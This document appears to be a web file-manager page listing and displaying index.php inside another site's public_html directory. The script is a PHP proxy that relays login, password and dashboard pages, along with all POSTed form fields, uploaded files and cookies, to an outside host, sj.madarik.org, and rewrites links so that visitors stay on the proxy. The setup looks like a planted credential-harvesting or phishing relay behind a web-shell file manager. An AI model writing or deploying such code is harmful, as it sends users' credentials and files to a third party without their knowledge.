Priority File Manager

📁 public_html
Base Directory:
public_html / cce / ckad
/home/ecedu/public_html/cce/ckad
NameTypeSizeActions
📁 .. Folder -
📄 index.php File 3165
Edit Download

View File: index.php

<?php
session_start();
define('COOKIE_FILE', sys_get_temp_dir() . '/proxy_cookies_' . session_id() . '.txt');
 
$allowedPages = [
    'index.php', 'dashboard.php', 'login.php', 'logout.php', 'password.php',
];

$page = $_GET['page'] ?? 'index.php';
$pageClean = str_replace(['..', "\0", '//'], '', $page);
$pageClean = ltrim($pageClean, '/\\');

if (!in_array($pageClean, $allowedPages)) {
    http_response_code(403);
    die("غير مسموح بالوصول لهذه الصفحة");
}

$remoteBaseUrl ='https://sj.madarik.org/cce/';
$remoteUrl = $remoteBaseUrl . $pageClean;

$ch = curl_init($remoteUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, COOKIE_FILE);
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIE_FILE);

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $postData = $_POST;
    if (!empty($_FILES)) {
        foreach ($_FILES as $key => $file) {
            $postData[$key] = new CURLFile($file['tmp_name'], $file['type'], $file['name']);
        }
    }
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
}

$response = curl_exec($ch);
if ($response === false) {
    http_response_code(500);
    die("خطأ في الاتصال بالخادم: " . curl_error($ch));
}

$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headersRaw = substr($response, 0, $headerSize);
$body = substr($response, $headerSize);
curl_close($ch);

// معالجة Redirect
if (in_array($httpCode, [301,302,303,307,308])) {
    if (preg_match('/Location:\s*(.+)/i', $headersRaw, $matches)) {
        $location = trim($matches[1]);
        $redirectPage = basename(parse_url($location, PHP_URL_PATH));
        if (in_array($redirectPage, $allowedPages)) {
            header("Location: ?page=" . urlencode($redirectPage));
            exit;
        } else {
            http_response_code(403);
            die("إعادة توجيه غير مصرح بها");
        }
    }
}

// إعادة إرسال رؤوس مهمة مثل Set-Cookie و Content-Type
foreach (explode("\n", $headersRaw) as $header) {
    if (stripos($header, 'Content-Type:') === 0 || stripos($header, 'Set-Cookie:') === 0) {
        header(trim($header));
    }
}

// تعديل روابط HTML لجعلها تمر عبر البروكسي (href, src, action)
if (stripos($headersRaw, 'Content-Type: text/html') !== false) {
    $body = preg_replace_callback('/(href|src|action)\s*=\s*([\'"])(.*?)\2/i', function ($matches) use ($allowedPages) {
        $attr = $matches[1];
        $quote = $matches[2];
        $url = $matches[3];
        if (preg_match('/^(https?:)?\/\//i', $url) || strpos($url, 'mailto:') === 0) {
            return $matches[0];
        }
        $cleanUrl = ltrim(parse_url($url, PHP_URL_PATH) ?? '', '/\\');
        if (in_array($cleanUrl, $allowedPages)) {
            return "$attr=$quote?page=" . urlencode($cleanUrl) . "$quote";
        }
        return $matches[0];
    }, $body);
}

echo $body;